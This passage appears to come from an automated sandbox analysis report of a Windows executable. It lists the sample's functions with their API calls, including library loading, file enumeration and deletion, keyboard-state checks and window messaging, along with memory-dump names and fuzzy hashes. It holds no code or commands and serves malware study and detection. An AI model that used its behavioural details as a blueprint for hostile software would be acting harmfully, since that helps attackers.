Instruction ID: cc4084cd6f03f01059d3a70c286684eb7abce2a19a27439c98df6c7df54ca107
Opcode Fuzzy Hash: b9bdea8cf943d1563d6fa4beca718a37d14b0fae87c0ca0c0e9e5a42a90c8867
Instruction Fuzzy Hash: C5F0A7719183089FD7A2CFA4DC457DA7BBC9B01308F0002E9EA48962A2D7B14B89CF51

Function 00A6C355 Relevance: 1.8, APIs: 1, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: LoadString$__swprintf
String ID:
API String ID: 207118244-0
Opcode ID: 462e02669e37121799a5bf56188d563e3a2aa0ebbd9549f378b8e23e50ecda7f
Instruction ID: e4c2e1e342aebca87837dede858d2eebc69d101fa6f10f71ba46c6e37bb559f6
Opcode Fuzzy Hash: 462e02669e37121799a5bf56188d563e3a2aa0ebbd9549f378b8e23e50ecda7f
Instruction Fuzzy Hash: F0B15B35A0010AEFCB14DF98D891DFEB7B5FF48720F10811AF916AB291EB70A945CB90

Function 009FA820 Relevance: 1.7, APIs: 1, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3171ba3b905bcb7b6a6de5e97d8fbf2276e8d3b99eb9c82fa3538bfa3562425
Instruction ID: 750baa023007c8e409382442bf28e38da6c8f11104f26263421c6a03efbd955c
Opcode Fuzzy Hash: d3171ba3b905bcb7b6a6de5e97d8fbf2276e8d3b99eb9c82fa3538bfa3562425
Instruction Fuzzy Hash: 6A61CCB060020ADFDB10DF54C981B7AB7F9EF44350F11856DEA1A9B291D7B8ED80CB52

Function 00A0343F Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00A0351A

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 7a9628b4677101286da96b24158057784d4e543a3e092ee71b03b5c8c780e813
Instruction ID: 354ca8e5f80b91dcca7a094457932e2b54b5cb40251ff24841c53ae6ac502cd1
Opcode Fuzzy Hash: 7a9628b4677101286da96b24158057784d4e543a3e092ee71b03b5c8c780e813
Instruction Fuzzy Hash: 8131D47A604606DFCB24DF18E450A21F7B8FF08310714C56AE98A8F7A1D770EC81CB80

Function 00A2E2DF Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00A2E2EA

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 7916d7af3864f8c0614a6e9bd67cbe3d48f63980985c8afcabf156901673f9df
Instruction ID: 708f4ecee080a49a39cfe286b0d0f785ad110472e14623b1b777e3134b9dd4bb
Opcode Fuzzy Hash: 7916d7af3864f8c0614a6e9bd67cbe3d48f63980985c8afcabf156901673f9df
Instruction Fuzzy Hash: 36413B74508355DFDB14DF18C584B2ABBE1BF45308F0989ACE9898B362C331EC85CB52

Function 00A049C2 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A04B29: FreeLibrary.KERNEL32(00000000,?), ref: 00A04B63

Part of subcall function 00A1547B: __wfsopen.LIBCMT ref: 00A15486

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00A027AF,?,00000001), ref: 00A049F4

Part of subcall function 00A04ADE: FreeLibrary.KERNEL32(00000000), ref: 00A04B18

Part of subcall function 00A048B0: _memmove.LIBCMT ref: 00A048FA

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: c0d33223aef6e3795a3dda4fc4003a67744de1456b19e98ed7a4eb5f6ba338f1
Instruction ID: ed4830b2bf4d70cd9575a111fddd91168d2f4baf1e33b71faee2a48d962aad9e
Opcode Fuzzy Hash: c0d33223aef6e3795a3dda4fc4003a67744de1456b19e98ed7a4eb5f6ba338f1
Instruction Fuzzy Hash: AB11277275020DABDB10FB74DE02FAE77A9AF48741F108429F641AA1C1EA708A04A794

Function 00A01BCC Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00A01BFE

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 25aaaec36362d06fb08d722cb288e75b5f547c46fb5771c96884fc2fb0937184
Instruction ID: 43647b8e2c6f6a3b337e5123e701c504f1e832e24454e5b455810830711c658d
Opcode Fuzzy Hash: 25aaaec36362d06fb08d722cb288e75b5f547c46fb5771c96884fc2fb0937184
Instruction Fuzzy Hash: FA115B76604605DFD724CF28E581956F7F9FF49354B20C82EE88ACB2A1E732E881CB50

Function 00A2E3C2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00A2E3CE

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 3df46e8315cc99439de39af705184afe44a5d3ab04a0cb410e6af732624d1666
Instruction ID: 8441254fe320a3d0726c6fbde6c1f1a0519420556757f5ea65a08f25a9bc2f79
Opcode Fuzzy Hash: 3df46e8315cc99439de39af705184afe44a5d3ab04a0cb410e6af732624d1666
Instruction Fuzzy Hash: 23211374A08355DFCB54DF14C544B6ABBE4BF88304F05896CFA8A97322C331E849CB92

Function 00A01A36 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00A01A77

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 8565a2e206dddf4350968ef93c696b5c539dc39c822a590dc04b60a48f516eb7
Instruction ID: d6afe5ddb90f452b66414a2e49d8c76144515a5796aa0594578f65f499295bce
Opcode Fuzzy Hash: 8565a2e206dddf4350968ef93c696b5c539dc39c822a590dc04b60a48f516eb7
Instruction Fuzzy Hash: 7201F9727017056ED3245F38ED06FA7BBA8DB447E0F50852EF65ACA1D1EB71E49087A0

Function 00A6495B Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00A64998

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: EnvironmentVariable
String ID:
API String ID: 1431749950-0
Opcode ID: f98188059ce1278114d03647e6b2922ccc257ca92b259ba4f09b113bddafb8fb
Instruction ID: 80c360d277d1c4db2e8965365cbd3a89750807af3427f08e7d7630c2d009f4b5
Opcode Fuzzy Hash: f98188059ce1278114d03647e6b2922ccc257ca92b259ba4f09b113bddafb8fb
Instruction Fuzzy Hash: 45F04475608208AFCB14FB65D946CAF7BBCEF49320B004155F9049B291EE70BD81C751

Function 00A57C7F Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00A10FE6: std::exception::exception.LIBCMT ref: 00A1101C
Part of subcall function 00A10FE6: __CxxThrowException@8.LIBCMT ref: 00A11031

_memset.LIBCMT ref: 00A57CB4

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Exception@8Throw_memsetstd::exception::exception
String ID:
API String ID: 525207782-0
Opcode ID: 3ecc4d077f8347220a40a240f02962e6a21ded5fff4d928bb21853c154afc254
Instruction ID: 2b5475c121d6f3b13a66e3ad65984dc221b18f66f061b9a081c27515ede30e4d
Opcode Fuzzy Hash: 3ecc4d077f8347220a40a240f02962e6a21ded5fff4d928bb21853c154afc254
Instruction Fuzzy Hash: 0301F6752042049FD321EF5CD542F4ABBE1AF5D310F25845AF5888B392DBB2E881CB90

Function 00A2DC5A Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 00A10FE6: std::exception::exception.LIBCMT ref: 00A1101C
Part of subcall function 00A10FE6: __CxxThrowException@8.LIBCMT ref: 00A11031

_memmove.LIBCMT ref: 00A2DC8B

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Exception@8Throw_memmovestd::exception::exception
String ID:
API String ID: 1602317333-0
Opcode ID: 45a849d2a6824c2a98c98ed0063ef32583db97a8290c264e89d73d06c63a9186
Instruction ID: c87103de96a29e3de736a7dd795662e8a7268c023cb726b007b6f2c473e8026b
Opcode Fuzzy Hash: 45a849d2a6824c2a98c98ed0063ef32583db97a8290c264e89d73d06c63a9186
Instruction Fuzzy Hash: 81F01274604101DFD710DF6CC642E55BBE1BF1D300B25845CE1998B352E773D891CB91

Function 00A04A8C Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

_fseek.LIBCMT ref: 00A04AA4

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: _fseek
String ID:
API String ID: 2937370855-0
Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction ID: fa1ce42895aa50da5bc2153a0e723498e7b455789724c18e66bc1033881df5de
Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction Fuzzy Hash: 77F08CB6500208FFDF108F54DC04CEB7B79EF89320F00459CF9045A111D232EA619BA0

Function 00A04A2F Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00A027AF,?,00000001), ref: 00A04A63

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: cd7f3f4dd87bc1631b2ff3dd21a7df3e315e98860e4049072b88a4b76c29184d
Instruction ID: feb8e418c4d7a8ae89a53132f431ee2f4e9d311c8053b87b987b5184f98554e0
Opcode Fuzzy Hash: cd7f3f4dd87bc1631b2ff3dd21a7df3e315e98860e4049072b88a4b76c29184d
Instruction Fuzzy Hash: 6EF015B1645705CFCB349F64E494816BBF5BF983A53208A2EE2D683650C731A984DB54

Function 00A04AB2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00A04AD0

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction ID: 8b41e12020c33aa262ac7741958e80894f85c64f19c55b6941dadcdbdb6039bf
Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction Fuzzy Hash: C7F0587640020DFFDF04DF90C941EAABB79FB08314F208189F9198A212D336DA21AB90

Function 00A30A79 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00A30A84

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: d8fb7b1be5355a24cef1e799e096cc20d8a0b4c741d6fb3133ebe76757589c68
Instruction ID: 9d8a560f01878e2fb2b7e4dd5f205a4bad8d01948138fe873335bcd997747e6c
Opcode Fuzzy Hash: d8fb7b1be5355a24cef1e799e096cc20d8a0b4c741d6fb3133ebe76757589c68
Instruction Fuzzy Hash: 90E022B1B0834A9FE730DBA9A414F32FBE8AB00310F10452AE599C1240E37698A497A1

Function 00A109C5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00A109E4

Part of subcall function 00A01821: _memmove.LIBCMT ref: 00A0185B

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: a22c34e27b82f7f0fa942cf454fefded9a8d440191dc8bf03cb6a030eb247873
Instruction ID: 533176f49976954fd13292b49b182880108e9f63023e16ef1873eb037cdad5c1
Opcode Fuzzy Hash: a22c34e27b82f7f0fa942cf454fefded9a8d440191dc8bf03cb6a030eb247873
Instruction Fuzzy Hash: EBE0CD3290012857C721E69CAC05FEE77EDDF89790F0441B6FC0CD7344D9649D8586D1

Function 00A54FEC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00A53BFE), ref: 00A54FED

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: fef377b8a41045772d1962790befa66c4398c4ebaf489dbf7ba463dd25cd8d00
Instruction ID: de2bea17638f3e3fa0adfcff402bb779a0d9fca1364772e070a956fba05ee3f7
Opcode Fuzzy Hash: fef377b8a41045772d1962790befa66c4398c4ebaf489dbf7ba463dd25cd8d00
Instruction Fuzzy Hash: 94B09234000680769D681F3C194C8993301684ABBE7D81B81E878854E59239888FE720

Function 00A1547B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00A15486

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 0d11ad9628d7e152edc1576c2bc3e62233026662f5e047cd6f167ea8b3ef1101
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: E6B0927684020CB7CE012A92EC03A993B2A9B84668F408020FB0C1C162A673A6A09689

Function 00A5C270 Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00A54005: FindFirstFileW.KERNEL32(?,?), ref: 00A5407C
Part of subcall function 00A54005: DeleteFileW.KERNEL32(?,?,?,?), ref: 00A540CC
Part of subcall function 00A54005: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00A540DD
Part of subcall function 00A54005: FindClose.KERNEL32(00000000), ref: 00A540F4

GetLastError.KERNEL32 ref: 00A5C292

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: FileFind$CloseDeleteErrorFirstLastNext
String ID:
API String ID: 2191629493-0
Opcode ID: 30cf17ae3d0e2edb2a19fc5205cba0832fe1fe5e58538870e64be469fcc207ee
Instruction ID: 13099d1d0fd02178f333cb856018cc723f1bbd623d4b9ae4898aeb888ba54e5d
Opcode Fuzzy Hash: 30cf17ae3d0e2edb2a19fc5205cba0832fe1fe5e58538870e64be469fcc207ee
Instruction Fuzzy Hash: A7F082312102148FCB10EF59D840F6AB7E5BF88324F058019FA099B392CB74BC01CB94

Non-executed Functions

Function 00A7D164 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 009F29E2: GetWindowLongW.USER32(?,000000EB), ref: 009F29F3

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00A7D208
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A7D249
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00A7D28E
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A7D2B8
SendMessageW.USER32 ref: 00A7D2E1
_wcsncpy.LIBCMT ref: 00A7D359
GetKeyState.USER32(00000011), ref: 00A7D37A
GetKeyState.USER32(00000009), ref: 00A7D387
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A7D39D
GetKeyState.USER32(00000010), ref: 00A7D3A7
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A7D3D0
SendMessageW.USER32 ref: 00A7D3F7
SendMessageW.USER32(?,00001030,?,00A7B9BA), ref: 00A7D4FD
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00A7D513
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00A7D526
SetCapture.USER32(?), ref: 00A7D52F
ClientToScreen.USER32(?,?), ref: 00A7D594
